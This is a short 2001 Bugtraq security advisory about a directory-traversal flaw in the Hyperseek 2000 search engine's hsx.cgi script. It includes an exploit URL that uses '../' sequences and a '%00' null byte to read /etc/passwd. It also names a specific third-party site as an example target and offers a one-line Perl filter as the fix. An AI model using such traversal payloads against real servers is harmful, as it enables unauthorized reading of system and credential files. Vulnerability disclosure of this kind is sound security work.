Date: Sun, 28 Jan 2001 10:28:52 +0300 From: MC GaN <vipersv@MAIL.RU> Subject: Hyperseek 2000 Search Engine - "show directory & files" bug To: BUGTRAQ@SECURITYFOCUS.COM --== NerF security gr0up advisory ==-- -------------------------------------------------------------------- Hyperseek 2000 Search Engine - "show directory & files" bug. -------------------------------------------------------------------- 1. Standart perl problem is in statistic module - file: hsx.cgi, script does not filter ../ and %00. Through this bug, you can remotely read any file and make listing of directory. ../ - directory up, %00 hex symbol, that means end of line. 2. Exploit url: http://www.victim.ru/cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00 Note: directory can change and amount of ../ can vary. 3. Example: http://www.netsurprise.de/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/passwd%00 4. Filter symbols like: $dat=~ s/\0//g; -------------------------------------------------------------------- NerF security gr0up (Russia) - www.nerf.f2s.com